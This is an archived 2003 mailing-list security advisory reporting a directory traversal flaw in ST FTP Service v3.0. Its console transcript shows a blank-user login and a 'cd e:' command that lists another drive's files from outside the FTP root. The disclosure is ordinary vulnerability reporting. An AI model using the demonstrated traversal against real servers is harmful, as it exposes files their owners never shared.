ST FTP Service v3.0: directory traversal

From: D4rkGr3y (grey_1999at_private)
Date: Fri May 23 2003 - 22:27:09 PDT

Next message: Joe Testa: "[Full-Disclosure] Re: QuickTime/Darwin Streaming Server security issues"

Previous message: Joe Testa: "Re: QuickTime/Darwin Streaming Server security issues"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

################################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
################################################################*
#Product: ST FTP Service v3.0
#Authors: [stsoft.newmail.ru]
#Vulnerability: directory traversal
################################################################*

#Overview#------------------------------------------------------#
Easy russian ftp server for home network.

#Problem#-------------------------------------------------------#
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>ftp 127.0.0.1
Connected to 127.0.0.1.
220-
220 Service ready for new user.
User (127.0.0.1:(none)):
230 User  logged in, proceed.
ftp> pwd
257 "/" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp> cd e:
250 Requested file action okay, completed.
ftp> pwd
257 "e:" is working directory.
ftp> ls
200 PORT command okay.
150 File status okay; about to open data connection.
03-05-03  12:58PM       <DIR>          video
05-21-03  05:46PM             267964416 hiberfil.sys
02-18-03  04:18AM       <DIR>          Documents and Settings
03-11-03  12:00PM       <DIR>          Program Files
05-21-03  05:46PM             402653184 pagefile.sys
02-18-03  07:31AM       <DIR>          System Volume Information
02-18-03  07:37AM       <DIR>          Recycled
04-27-03  05:21PM                  214 firewall.log
03-09-03  07:09PM       <DIR>          WINDOWS
01-03-02  10:15PM       <DIR>          shit
01-12-02  12:10AM       <DIR>          MSSQL7
226 Closing data connection.
ftp: 579 bytes received in 0,00Seconds 579000,00Kbytes/sec.
ftp> bye
221-
221 Service closing control connection.

C:\>

#Exploit#--------------------------------------------------------#
none

#wow#------------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPsxG/m4LIpseSJmPAQG0hwP/ZpIWo49+6nYRFwR64dgNa+KLbKAP4Qcr
Fz8l9go1AcYZi3ouGDQ9AwcpwapMsJwcUtkwpw1f+ZGfXiLO2BWRwc2aFL0FEDYi
8HsUYvXp6x4x9b/WvoNh4/MCvROTH07dopKbrn7gaj8iPPsiV2NUIds2LLFgqHrt
h0z6aR0rDGo=
=qa0l
-----END PGP SIGNATURE-----

Next message: Joe Testa: "[Full-Disclosure] Re: QuickTime/Darwin Streaming Server security issues"
Previous message: Joe Testa: "Re: QuickTime/Darwin Streaming Server security issues"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 23 2003 - 14:02:24 PDT